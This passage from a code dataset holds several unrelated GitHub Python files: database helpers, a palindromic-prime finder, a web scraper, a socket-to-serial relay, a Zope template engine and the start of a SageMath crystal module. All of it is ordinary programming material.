merge_sort(list(items), comp)","repo_name":"createnewdemo/pycharm_pracise1","sub_path":"基础加强/数据结构算法/合并2个有序列表.py","file_name":"合并2个有序列表.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"71057922039","text":"import conexion_mysql\nfrom conexion_mysql import Customer\nfrom sqlalchemy.orm import sessionmaker\n\n\nSession = sessionmaker(bind=conexion_mysql.engine)\nsession = Session()\n\n\ndef save_mariadb(info):\n exist = check_info_mariadb(info)\n if exist:\n print(\"Ya existe el elemento en MariaDB\")\n else:\n new_model = Customer(Model = info[2], Vendor = info[0], Softver = info[1])\n session.add(new_model)\n session.commit() \n print(\"Guardando en MariaDB\")\n\n\ndef check_info_mariadb(info):\n Session = sessionmaker(bind=conexion_mysql.engine)\n session = Session()\n models = session.query(Customer).all()\n counter = 0\n for model in models:\n if model.Model == info[2]:\n counter += 1\n if model.Vendor == info[0]:\n counter += 1\n if model.Softver == info[1]:\n counter += 1\n if counter == 3:\n return True\n else:\n return False\n","repo_name":"castrodiegojose/backend_snmp_python","sub_path":"src/save_Mariadb.py","file_name":"save_Mariadb.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9920029530","text":"\"\"\"Palindromic prime finder\r\nCharlie Shang\r\n9 May 2014\"\"\"\r\n\r\n#Increase the recursion limit in python\r\nimport sys\r\nsys.setrecursionlimit (30000)\r\n\r\n#Ask for start and end 
{"seq_id":"9920029530","text":"\"\"\"Palindromic prime finder\r\nCharlie Shang\r\n9 May 2014\"\"\"\r\n\r\n#Increase the recursion limit in python\r\nimport sys\r\nsys.setrecursionlimit(30000)\r\n\r\n#Ask for start and end points\r\nN = int(input(\"Enter the starting point N:\\n\"))\r\nM = int(input(\"Enter the ending point M:\\n\"))\r\n\r\nif N > 1: \r\n num = N\r\nelse:\r\n num = 2 #if starting point is less than 2, set as 2 because 1 is not prime\r\n\r\nprint(\"The palindromic primes are:\")\r\n \r\ndef is_palindrome(num):\r\n \"\"\"Determine whether a number is a palindrome (True/False)\"\"\"\r\n \r\n num = str(num) #Converts the number to a string.\r\n \r\n #If the length is <= 3 and the first character equals the last, it is a palindrome\r\n if num[0] == num[-1] and len(num) <= 3:\r\n return True\r\n \r\n #If length > 3 and the ends match, strip the first and last characters and re-check\r\n elif num[0] == num[-1]: \r\n return is_palindrome(num[1:-1])\r\n \r\n #Return False if not a palindrome.\r\n \r\n else:\r\n return False\r\n\r\ndef send(num):\r\n \"\"\"Send palindromic numbers to 'is_prime'.\"\"\" \r\n \r\n if num > M: #Recursion ends when the end point is reached \r\n return -1\r\n \r\n #Check if the current number is a palindrome. If it is, send it to is_prime.\r\n Check = is_palindrome(num)\r\n if Check == True:\r\n div = 2\r\n \r\n return is_prime(num, div)\r\n \r\n else: #otherwise check whether the next number is a palindrome\r\n return send(num+1)\r\n \r\ndef is_prime(num, div):\r\n \"\"\"Determine whether a number is prime\"\"\"\r\n \r\n #only repeat while the divisor is no larger than num**(1/2)\r\n if div <= num**(1/2):\r\n \r\n if num%div == 0:\r\n return send(num+1) #if a palindrome is not a prime, check the next palindrome\r\n \r\n else:\r\n return is_prime(num, div + 1) #If the divisor does not divide num, increase it and repeat.\r\n \r\n \r\n else:#If palindrome and prime, print it and find the next palindromic prime by recursion.\r\n \r\n print(num)\r\n return send(num+1)\r\n \r\nif __name__==\"__main__\":\r\n send(num)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/shnhua002/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
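The palindromic-prime record above leans on deep recursion (hence the raised recursion limit); the same search fits in a few iterative lines. A sketch under that assumption, not the record's own code:

    def is_palindrome(n):
        s = str(n)
        return s == s[::-1]  # a string is a palindrome iff it equals its reverse

    def is_prime(n):
        if n < 2:
            return False
        d = 2
        while d * d <= n:  # trial division up to sqrt(n)
            if n % d == 0:
                return False
            d += 1
        return True

    print([n for n in range(2, 200) if is_palindrome(n) and is_prime(n)])
    # [2, 3, 5, 7, 11, 101, 131, 151, 181, 191]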
{"seq_id":"11520477372","text":"import re\n\nimport requests\nimport time\nfrom lxml import etree\nimport pymysql\n\nfrom celery_pro.utils.config import config\n\n\nclass ArticleSpider(object):\n def __init__(self):\n self.db = pymysql.connect(host=config.SPIDER_HOST, user=config.SPIDER_USER,\n password=config.SPIDER_PASSWORD, db=config.SPIDER_DB, port=config.SPIDER_PORT)\n\n def get_picture(self):\n for i in range(1, 20):\n main_url = \"https://www.89829m.com/bbs/bbs\"\n main_url += \"0\" + str(i) if i < 10 else str(i)\n main_url += \".html\"\n response = requests.get(url=main_url, timeout=20)\n text = response.text\n # print(text.encode(response.encoding).decode(\"utf-8\"))\n html = etree.HTML(text.encode(response.encoding).decode(\"utf-8\"))\n li_list = html.xpath(\"/html/body/div[4]/div/ul/li\")\n\n # page title\n title = html.xpath(\"/html/body/div[4]/div/h3/text()\")\n period = title[0][1:4]\n print(title, period)\n\n for li in li_list:\n text_list = li.xpath(\"./text()\") #\n text_2 = li.xpath(\"./span/text()\") # guess\n text_3 = li.xpath(\"./span/u/text()\")[0] if li.xpath(\"./span/u/text()\") else \"\" # hit\n text_4 = li.xpath(\"./font/text()\")[0] if li.xpath(\"./font/text()\") else \"\" # result\n print(text_list, text_2, text_3, text_4)\n kai_1 = text_2[1] if len(text_2) == 2 else \"\"\n kai_2 = text_2[0] if text_2 else \"\"\n guess = kai_2 + text_3 + kai_1\n result = text_4\n content_1 = text_list[0] if text_list else \"\"\n content_2 = text_list[1] if len(text_list) == 2 else \"\"\n content_3 = text_list[2] if len(text_list) == 3 else \"\"\n content = content_1 + guess + content_2 + result + content_3\n print(content)\n self.save_in_db(title=title, period=period, content=content, result=result, guess=guess)\n self.db.close()\n\n return self\n\n def save_in_db(self, title, period, content, result, guess):\n cur = self.db.cursor()\n sql_insert = \"insert into article(create_time,title,period,content,result,guess) values(%s,%s,%s,%s,%s,%s)\"\n cur.execute(sql_insert, (int(time.time()), title, period, content, result, guess))\n # commit the insert\n self.db.commit()\n return self\n\n\na = ArticleSpider().get_picture()\n","repo_name":"thelastant/liuhc_spider","sub_path":"liuhc_spider/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"35552555478","text":"import pickle\nfrom components.extract_column.column import Column\nfrom components.extended_summaries.bert_summary import BertSummary\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport codecs, json \nimport numpy as np\n\nwith open('columns.p', 'rb') as f:\n columns = pickle.load(f)\nprint(\"Extracted Columns...\")\n# columns = columns\nBertsList = [BertSummary(col) for col in columns]\nprint(\"Built BertSummaries...\")\n\nembedList = np.array([bert.vector for bert in BertsList])\nprint(\"Extracted vectors...\")\nprint(embedList.shape)\ncosine_matrix = cosine_similarity(embedList)\nprint(\"Computed Cosines!...\")\nprint(cosine_matrix)\n\nfile_path = './similarities.json'\njson.dump(cosine_matrix.tolist(), codecs.open(file_path, 'w', encoding='utf-8'), separators=(',', ':'), sort_keys=True, indent=4) ### this saves the array in .json format\n","repo_name":"kabrol98/sella-cherian","sub_path":"testing/pipeline_testing/bert_test.py","file_name":"bert_test.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"6427231461","text":"\nimport argparse\n\nfrom hw2_utils import TraceEntry\n\n# Example for getting command line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\", type=str, help=\"path to input file\")\nparser.add_argument(\"output\", type=str, help=\"path to output file.\")\n\nargs = parser.parse_args()\n\nwith open(args.input) as in_fd, open(args.output, 'w') as out_fd:\n for line in in_fd:\n for entry in TraceEntry(line).split_blocks():\n out_fd.write(\"{}\\n\".format(str(entry)))","repo_name":"AmnonHanuhov/AdvancedTopics_236601","sub_path":"HW2/adapted_simulator/split_requests.py","file_name":"split_requests.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
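The bert_test record above passes an (n, d) matrix of row vectors to scikit-learn's cosine_similarity, which returns an (n, n) symmetric matrix with ones on the diagonal. A minimal sketch of that call on toy vectors (not the record's data):

    import numpy as np
    from sklearn.metrics.pairwise import cosine_similarity

    vecs = np.array([[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]])  # rows are samples
    sim = cosine_similarity(vecs)  # sim[i, j] is the cosine of rows i and j
    print(sim.round(3))  # diagonal entries are 1.0; orthogonal rows give 0.0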
{"seq_id":"4596250679","text":"import socket\nimport serial\ns = socket.socket()\nhost = '192.168.1.101' \nprint(host)\nport = 8002\ns.bind((host, port))\nser = serial.Serial('/dev/ttyACM0', 4800)\ns.listen(5)\nwhile True:\n c, addr = s.accept()\n print('Got connection from', addr)\n rec = c.recv(1024)\n ser.flushInput()\n ser.write(rec)\n print(rec.decode())\n c.close()\n","repo_name":"rnymke/Facecrasher","sub_path":"rpi/Tutorial/send_receive/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"20221553998","text":"\nimport numpy as np\n\nfrom .load_or_create_graph import Landscape\n\ndef create_obstacle_map(terrain: Landscape, obstacle_args: dict) -> np.ndarray:\n \"\"\"Create an obstacle map with the size of the terrain.\n \n A value of 1 at some location indicates that the location is an obstacle;\n 0 means it is not an obstacle (penetrable). Currently two kinds of obstacles are supported:\n - open: No obstacle whatsoever.\n - square: Rectangular obstacle defined as a fraction of the total size.\"\"\"\n\n assert obstacle_args['NAME'] in ['open', 'square'], 'Only no obstacle (open) and square obstacles are implemented.'\n\n obstacle_map = np.zeros_like(terrain.x_coords)\n\n if obstacle_args['NAME'] == 'open':\n return obstacle_map\n \n elif obstacle_args['NAME'] == 'square':\n\n size = terrain.x_coords.shape[0]\n params = obstacle_args['PARAMS']\n\n obstacle_map[int(params['FRACS_X'][0]*size):int(params['FRACS_X'][1]*size),\n int(params['FRACS_Y'][0]*size):int(params['FRACS_Y'][1]*size)] = 1\n \n return obstacle_map\n","repo_name":"PimVeefkind/iUGV","sub_path":"utils/create_obstacle_map.py","file_name":"create_obstacle_map.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"33760418296","text":"# coding=utf-8\n\"\"\"Status monitor on wechat, to report progress / status of project on wechat\"\"\"\n\nfrom datetime import datetime\nfrom logging import INFO\nfrom wxpy import get_wechat_logger\n\n\nwechat_logger = get_wechat_logger(name='status_monitor', level=INFO)\ntime_format = '%Y-%m-%d %H:%M:%S'\n\n\ndef status_monitor_on_wechat(func_):\n \"\"\"Decorator to send wechat messages to file helper when the decorated function is called and finished\"\"\"\n def inner_func(*args, **kwargs):\n \"\"\"Decorated function with general input\"\"\"\n _name = str(func_).split(' ')[1]\n _begin = datetime.now()\n wechat_logger.info('Start running function <{}> at {}'.format(_name, datetime.strftime(_begin, time_format)))\n\n try:\n _res = func_(*args, **kwargs)\n _end = datetime.now()\n _last = _end - _begin\n wechat_logger.info('Finish running function <{}> at {}, lasting {} seconds\\nResult: {}'.format(\n _name, datetime.strftime(_end, time_format), _last.total_seconds(), str(_res)))\n return _res\n\n except Exception as e:\n _msg = str(e)\n _end = datetime.now()\n _last = _end - _begin\n wechat_logger.error('Failed to run <{}> at {}, lasting {} seconds\\nError msg: {}'.format(\n _name, datetime.strftime(_end, time_format), _last.total_seconds(), _msg))\n raise Exception(_msg)\n\n return inner_func\n","repo_name":"TongyanXu/wechat_tools","sub_path":"ex_tools/status_monitor.py","file_name":"status_monitor.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
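The status_monitor record above wraps a function so that its start, duration, and result (or failure) are reported. The same decorator pattern, reduced to a self-contained sketch with print in place of the wechat logger (all names here are hypothetical):

    import functools
    import time

    def report_status(func):
        @functools.wraps(func)  # preserve the wrapped function's name and docstring
        def wrapper(*args, **kwargs):
            start = time.time()
            try:
                result = func(*args, **kwargs)
                print(f"{func.__name__} finished in {time.time() - start:.3f}s -> {result!r}")
                return result
            except Exception as exc:
                print(f"{func.__name__} failed after {time.time() - start:.3f}s: {exc}")
                raise
        return wrapper

    @report_status
    def add(a, b):
        return a + b

    add(1, 2)  # prints: add finished in 0.000s -> 3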
{"seq_id":"5721819220","text":"\r\nimport requests\r\nimport json\r\nimport jsonpath\r\n\r\nurl = \"https://reqres.in/api/users?page=2\"\r\n# send a GET request\r\nresponse = requests.get(url)\r\n\r\nassert response.status_code == 200\r\n\r\n# parse the response into JSON format\r\n\r\njson_response = json.loads(response.text)\r\n#print(json_response)\r\n\r\n# verify total pages\r\ntotal = jsonpath.jsonpath(json_response,'total')\r\nassert total[0] == 12\r\nprint(total)\r\n\r\n#\r\n\r\nfor i in range(0,6):\r\n last_name = jsonpath.jsonpath(json_response,'data['+str(i)+'].last_name')\r\n print((last_name[0]))\r\n\r\nresult = total == i\r\nprint(result)\r\n","repo_name":"rychvalsky/qats","sub_path":"qats_get_api.py","file_name":"qats_get_api.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"31356924819","text":"__docformat__ = 'restructuredtext'\n\nimport sys\n\nfrom zope.interface import implements\n\nfrom zope.tales.expressions import PathExpr, StringExpr, NotExpr, DeferExpr\nfrom zope.tales.expressions import SimpleModuleImporter\nfrom zope.tales.pythonexpr import PythonExpr\nfrom zope.tales.tales import ExpressionEngine, Context\n\nfrom zope.component.exceptions import ComponentLookupError\nfrom zope.app.traversing.interfaces import TraversalError\nfrom zope.security.untrustedpython import rcompile\nfrom zope.security.proxy import ProxyFactory\nfrom zope.security.untrustedpython.builtins import SafeBuiltins\nfrom zope.i18n import translate\n\nfrom zope.app import zapi\nfrom zope.app.i18n import ZopeMessageFactory as _\nfrom zope.app.traversing.adapters import Traverser, traversePathElement\nfrom zope.app.traversing.interfaces import IPathAdapter, ITraversable\n\nclass InlineCodeError(Exception):\n pass\n\n\ndef zopeTraverser(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n \"\"\"\n request = getattr(econtext, 'request', None)\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n object = traversePathElement(object, name, path_items,\n request=request)\n object = ProxyFactory(object)\n return object\n\nclass ZopePathExpr(PathExpr):\n\n def __init__(self, name, expr, engine):\n super(ZopePathExpr, self).__init__(name, expr, engine, zopeTraverser)\n\n\ndef trustedZopeTraverser(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n \"\"\"\n traverser = Traverser(object)\n return traverser.traverse(path_items,\n request=getattr(econtext, 'request', None))\n\nclass TrustedZopePathExpr(PathExpr):\n\n def __init__(self, name, expr, engine):\n super(TrustedZopePathExpr, self).__init__(name, expr, engine,\n trustedZopeTraverser)\n\n\n# Create a version of the restricted built-ins that uses a safe\n# version of getattr() that wraps values in security proxies where\n# appropriate:\n\n\nclass ZopePythonExpr(PythonExpr):\n\n def __call__(self, econtext):\n __traceback_info__ = self.text\n vars = self._bind_used_names(econtext, SafeBuiltins)\n return eval(self._code, vars)\n\n def _compile(self, text, filename):\n return rcompile.compile(text, filename, 'eval')\n\n\nclass ZopeContextBase(Context):\n \"\"\"Base class for both trusted and untrusted evaluation contexts.\"\"\"\n\n def evaluateText(self, expr):\n text = self.evaluate(expr)\n if text is self.getDefault() or text is None:\n return text\n if isinstance(text, basestring):\n # text could be a proxied/wrapped object\n return text\n return unicode(text)\n\n def evaluateMacro(self, expr):\n macro = Context.evaluateMacro(self, expr)\n return macro\n\n def translate(self, msgid, domain=None, mapping=None, default=None):\n return translate(msgid, domain, mapping,\n context=self.request, default=default)\n\n evaluateInlineCode = False\n\n def 
evaluateCode(self, lang, code):\n if not self.evaluateInlineCode:\n raise InlineCodeError(\n _('Inline Code Evaluation is deactivated, which means that '\n 'you cannot have inline code snippets in your Page '\n 'Template. Activate Inline Code Evaluation and try again.'))\n\n # TODO This is only needed when self.evaluateInlineCode is true,\n # so should only be needed for zope.app.pythonpage.\n from zope.app.interpreter.interfaces import IInterpreter\n interpreter = zapi.queryUtility(IInterpreter, lang)\n if interpreter is None:\n error = _('No interpreter named \"${lang_name}\" was found.',\n mapping={'lang_name': lang})\n raise InlineCodeError(error)\n\n globals = self.vars.copy()\n result = interpreter.evaluateRawCode(code, globals)\n # Add possibly new global variables.\n old_names = self.vars.keys()\n for name, value in globals.items():\n if name not in old_names:\n self.setGlobal(name, value)\n return result\n\n\nclass ZopeContext(ZopeContextBase):\n \"\"\"Evaluation context for untrusted programs.\"\"\"\n\n def setContext(self, name, value):\n # Hook to allow subclasses to do things like adding security proxies\n Context.setContext(self, name, ProxyFactory(value))\n\n\nclass TrustedZopeContext(ZopeContextBase):\n \"\"\"Evaluation context for trusted programs.\"\"\"\n\n\nclass AdapterNamespaces(object):\n \"\"\"Simulate tales function namespaces with adapter lookup.\n\n When we are asked for a namespace, we return an object that\n actually computes an adapter when called:\n\n To demonstrate this, we need to register an adapter:\n\n >>> from zope.app.testing.placelesssetup import setUp, tearDown\n >>> setUp()\n >>> from zope.app.testing import ztapi\n >>> def adapter1(ob):\n ... return 1\n >>> ztapi.provideAdapter(None, IPathAdapter, adapter1, 'a1')\n\n Now, with this adapter in place, we can try out the namespaces:\n\n >>> ob = object()\n >>> namespaces = AdapterNamespaces()\n >>> namespace = namespaces['a1']\n >>> namespace(ob)\n 1\n >>> namespace = namespaces['a2']\n >>> namespace(ob)\n Traceback (most recent call last):\n ...\n KeyError: 'a2'\n\n\n Cleanup:\n\n >>> tearDown()\n \"\"\"\n\n def __init__(self):\n self.namespaces = {}\n\n def __getitem__(self, name):\n namespace = self.namespaces.get(name)\n if namespace is None:\n def namespace(object):\n try:\n return zapi.getAdapter(object, IPathAdapter, name)\n except ComponentLookupError:\n raise KeyError(name)\n\n self.namespaces[name] = namespace\n return namespace\n\n\nclass ZopeEngine(ExpressionEngine):\n \"\"\"Untrusted expression engine.\n\n This engine does not allow modules to be imported; only modules\n already available may be accessed::\n\n >>> modname = 'zope.app.pagetemplate.tests.trusted'\n >>> engine = _Engine()\n >>> context = engine.getContext(engine.getBaseNames())\n\n >>> modname in sys.modules\n False\n >>> context.evaluate('modules/' + modname)\n Traceback (most recent call last):\n ...\n KeyError: 'zope.app.pagetemplate.tests.trusted'\n\n (The use of ``KeyError`` is an unfortunate implementation detail; I\n think this should be a ``TraversalError``.)\n\n Modules which have already been imported by trusted code are\n available, wrapped in security proxies::\n\n >>> m = context.evaluate('modules/sys')\n >>> m.__name__\n 'sys'\n >>> m._getframe\n Traceback (most recent call last):\n ...\n ForbiddenAttribute: ('_getframe', <module 'sys' (built-in)>)\n\n The results of Python expressions evaluated by this engine are\n wrapped in security proxies::\n\n >>> r = context.evaluate('python: {12: object()}.values')\n >>> type(r)\n <type 'zope.security._proxy._Proxy'>\n >>> r = 
context.evaluate('python: {12: object()}.values()[0].__class__')\n >>> type(r)\n <type 'zope.security._proxy._Proxy'>\n\n General path expressions provide objects that are wrapped in\n security proxies as well::\n\n >>> from zope.app.container.sample import SampleContainer\n >>> from zope.app.testing.placelesssetup import setUp, tearDown\n >>> from zope.security.checker import NamesChecker, defineChecker\n\n >>> class Container(SampleContainer):\n ... implements(ITraversable)\n ... def traverse(self, name, further_path):\n ... return self[name]\n\n >>> setUp()\n >>> defineChecker(Container, NamesChecker(['traverse']))\n >>> d = engine.getBaseNames()\n >>> foo = Container()\n >>> foo.__name__ = 'foo'\n >>> d['foo'] = ProxyFactory(foo)\n >>> foo['bar'] = bar = Container()\n >>> bar.__name__ = 'bar'\n >>> bar.__parent__ = foo\n >>> bar['baz'] = baz = Container()\n >>> baz.__name__ = 'baz'\n >>> baz.__parent__ = bar\n >>> context = engine.getContext(d)\n\n >>> o1 = context.evaluate('foo/bar')\n >>> o1.__name__\n 'bar'\n >>> type(o1)\n <type 'zope.security._proxy._Proxy'>\n\n >>> o2 = context.evaluate('foo/bar/baz')\n >>> o2.__name__\n 'baz'\n >>> type(o2)\n <type 'zope.security._proxy._Proxy'>\n >>> o3 = o2.__parent__\n >>> type(o3)\n <type 'zope.security._proxy._Proxy'>\n >>> o1 == o3\n True\n\n >>> o1 is o2\n False\n\n >>> tearDown()\n\n \"\"\"\n\n _create_context = ZopeContext\n\n def __init__(self):\n ExpressionEngine.__init__(self)\n self.namespaces = AdapterNamespaces()\n\n def getContext(self, __namespace=None, **namespace):\n if __namespace:\n if namespace:\n namespace.update(__namespace)\n else:\n namespace = __namespace\n\n context = self._create_context(self, namespace)\n\n # Put request into context so path traversal can find it\n if 'request' in namespace:\n context.request = namespace['request']\n\n # Put context into context so path traversal can find it\n if 'context' in namespace:\n context.context = namespace['context']\n\n return context\n\n\nclass TrustedZopeEngine(ZopeEngine):\n \"\"\"Trusted expression engine.\n\n This engine allows modules to be imported::\n\n >>> modname = 'zope.app.pagetemplate.tests.trusted'\n >>> engine = _TrustedEngine()\n >>> context = engine.getContext(engine.getBaseNames())\n\n >>> modname in sys.modules\n False\n >>> m = context.evaluate('modules/' + modname)\n >>> m.__name__ == modname\n True\n >>> modname in sys.modules\n True\n\n Since this is trusted code, we can look at whatever is in the\n module, not just __name__ or what's declared in a security\n assertion::\n\n >>> m.x\n 42\n\n Clean up after ourselves::\n\n >>> del sys.modules[modname]\n\n \"\"\"\n\n _create_context = TrustedZopeContext\n\n\nclass TraversableModuleImporter(SimpleModuleImporter):\n\n implements(ITraversable)\n\n def traverse(self, name, further_path):\n try:\n return self[name]\n except KeyError:\n raise TraversalError(name)\n\n\ndef _Engine(engine=None):\n if engine is None:\n engine = ZopeEngine()\n engine = _create_base_engine(engine, ZopePathExpr)\n engine.registerType('python', ZopePythonExpr)\n\n # Using a proxy around sys.modules allows page templates to use\n # modules for which security declarations have been made, but\n # disallows execution of any import-time code for modules, which\n # should not be allowed to happen during rendering.\n engine.registerBaseName('modules', ProxyFactory(sys.modules))\n\n return engine\n\ndef _TrustedEngine(engine=None):\n if engine is None:\n engine = TrustedZopeEngine()\n engine = _create_base_engine(engine, TrustedZopePathExpr)\n engine.registerType('python', PythonExpr)\n engine.registerBaseName('modules', TraversableModuleImporter())\n return engine\n\ndef 
_create_base_engine(engine, pathtype):\n for pt in pathtype._default_type_names:\n engine.registerType(pt, pathtype)\n engine.registerType('string', StringExpr)\n engine.registerType('not', NotExpr)\n engine.registerType('defer', DeferExpr)\n return engine\n\n\nEngine = _Engine()\nTrustedEngine = _TrustedEngine()\n\n\nclass AppPT(object):\n\n def pt_getEngine(self):\n return Engine\n\n\nclass TrustedAppPT(object):\n\n def pt_getEngine(self):\n return TrustedEngine\n","repo_name":"wpjunior/proled","sub_path":"Zope-2.9/lib/python/zope/app/pagetemplate/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":11875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14717763041","text":"\"\"\"\r\nThis file contains the main window for a Questionnaire Language (QL) parser GUI. The MainWindow contains an input_frame,\r\nwhich in turn contains a textbox for entering QL text, and a \"Parse\" button. When this button is pressed, the text is\r\nparsed and the encoded questionnaire is opened in an output_frame in the MainWindow. This questionnaire is interactive,\r\nand the entered answers may be saved to a .txt file by pressing the \"Submit\" button.\r\n\"\"\"\r\nfrom visitor.ql_visitor import visit_ql\r\nfrom visitor.qls_visitor import visit_qls\r\nfrom PyQt5 import QtWidgets, QtCore\r\nfrom antlr.parser import ParserInterface\r\nfrom gui.input_frame import InputFrame\r\nfrom gui.output_frame import OutputFrame\r\n\r\n\r\nclass MainWindow(QtWidgets.QWidget):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.main_layout = QtWidgets.QHBoxLayout()\r\n self.main_layout.setSpacing(10)\r\n self.setLayout(self.main_layout)\r\n self.setWindowTitle('Questionnaire builder')\r\n self.setGeometry(200, 200, 1000, 500)\r\n\r\n # Initiates inner frames\r\n self.input_frame = InputFrame()\r\n self.output_frame = OutputFrame()\r\n self.main_layout.addWidget(self.input_frame, alignment=QtCore.Qt.AlignLeft)\r\n self.main_layout.addWidget(self.output_frame, alignment=QtCore.Qt.AlignRight)\r\n\r\n # Connect btn with parsing\r\n self.input_frame.parse_is_pressed.connect(self.parse)\r\n\r\n def parse(self, ql_text, qls_text):\r\n \"\"\" Parse the GUI user input \"\"\"\r\n if ql_text:\r\n # Init & traverse QL AST\r\n ql_data = ParserInterface(ql_text, 'QL')\r\n\r\n if ql_data.errors:\r\n return self.initiate_output_frame(errors=ql_data.errors)\r\n\r\n [question_ids, questions, error_message, warning_message] = visit_ql(ql_data.ast)\r\n\r\n if qls_text:\r\n # Init & traverses QLS AST\r\n qls_data = ParserInterface(qls_text, 'QLS')\r\n\r\n if qls_data.errors:\r\n return self.initiate_output_frame(errors=qls_data.errors)\r\n\r\n [question_ids, questions, error_message] = visit_qls(qls_data.ast, question_ids, questions)\r\n\r\n # The output_frame is initialized and appropriately filled with questions and their answering widgets.\r\n self.initiate_output_frame(question_ids, questions, warning_message, error_message)\r\n\r\n else:\r\n self.initiate_output_frame(errors=[\"Error: QL input missing\"])\r\n\r\n def initiate_output_frame(self, question_ids=list(), questions=None, warning=None, errors=None):\r\n \"\"\" Reinitialize output frame \"\"\"\r\n self.output_frame.setParent(None)\r\n self.output_frame.destroy()\r\n\r\n self.output_frame = OutputFrame(question_ids, questions, warning, errors)\r\n self.main_layout.addWidget(self.output_frame, 
alignment=QtCore.Qt.AlignRight)","repo_name":"software-engineering-amsterdam/endless-ql","sub_path":"Pythonistas/gui/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70150801080","text":"r\"\"\"\nAlcove paths\n\nAUTHORS:\n\n- Brant Jones (2008): initial version\n- Arthur Lubovsky (2013-03-07): rewritten to implement affine type\n- Travis Scrimshaw (2016-06-23): implemented `\\mathcal{B}(\\infty)`\n\nSpecial thanks to: Nicolas Borie, Anne Schilling, Travis Scrimshaw, and\nNicolas Thiéry.\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2008 Brant Jones \n# Copyright (C) 2013 Arthur Lubovsky \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\nfrom sage.structure.parent import Parent\nfrom sage.structure.element import Element\nfrom sage.structure.element_wrapper import ElementWrapper\nfrom sage.structure.unique_representation import UniqueRepresentation\nfrom sage.structure.richcmp import richcmp\nfrom sage.categories.classical_crystals import ClassicalCrystals\nfrom sage.categories.loop_crystals import LoopCrystals\nfrom sage.graphs.digraph import DiGraph\nfrom sage.combinat.root_system.cartan_type import CartanType\nfrom sage.combinat.root_system.root_system import RootSystem\nfrom sage.all import vector\nfrom sage.rings.integer import Integer\nfrom sage.combinat.root_system.weyl_group import WeylGroup\nfrom sage.misc.misc_c import prod\nfrom sage.categories.sets_cat import Sets\nfrom sage.misc.cachefunc import cached_method, cached_in_parent_method\nfrom sage.categories.highest_weight_crystals import HighestWeightCrystals\nfrom copy import copy\nfrom sage.misc.latex import latex\n\n\nclass CrystalOfAlcovePaths(UniqueRepresentation, Parent):\n r\"\"\"\n Crystal of alcove paths generated from a \"straight-line\" path to the\n negative of a given dominant weight.\n\n INPUT:\n\n - ``cartan_type`` -- Cartan type of a finite or affine untwisted root\n system.\n\n - ``weight`` -- Dominant weight as a list of (integral) coefficients of\n the fundamental weights.\n\n - ``highest_weight_crystal`` -- (Default: ``True``) If ``True``\n returns the highest weight crystal. If ``False`` returns an\n object which is close to being isomorphic to the tensor product\n of Kirillov-Reshetikhin crystals of column shape in the\n following sense: We get all the vertices, but only some of the\n edges. We'll call the included edges pseudo-Demazure. They are\n all non-zero edges and the 0-edges not at the end of a 0-string\n of edges, i.e. not those with `f_{0}(b) = b'` with\n `\\varphi_0(b) =1`. (Whereas Demazure 0-edges are those that\n are not at the beginning of a zero string.) In this case the\n weight `[c_1, c_2, \\ldots, c_k]` represents\n `\\sum_{i=1}^k c_i \\omega_i`.\n\n .. NOTE::\n\n If ``highest_weight_crystal`` = ``False``, since we do not\n get the full crystal, ``TestSuite`` will fail on the\n Stembridge axioms.\n\n .. 
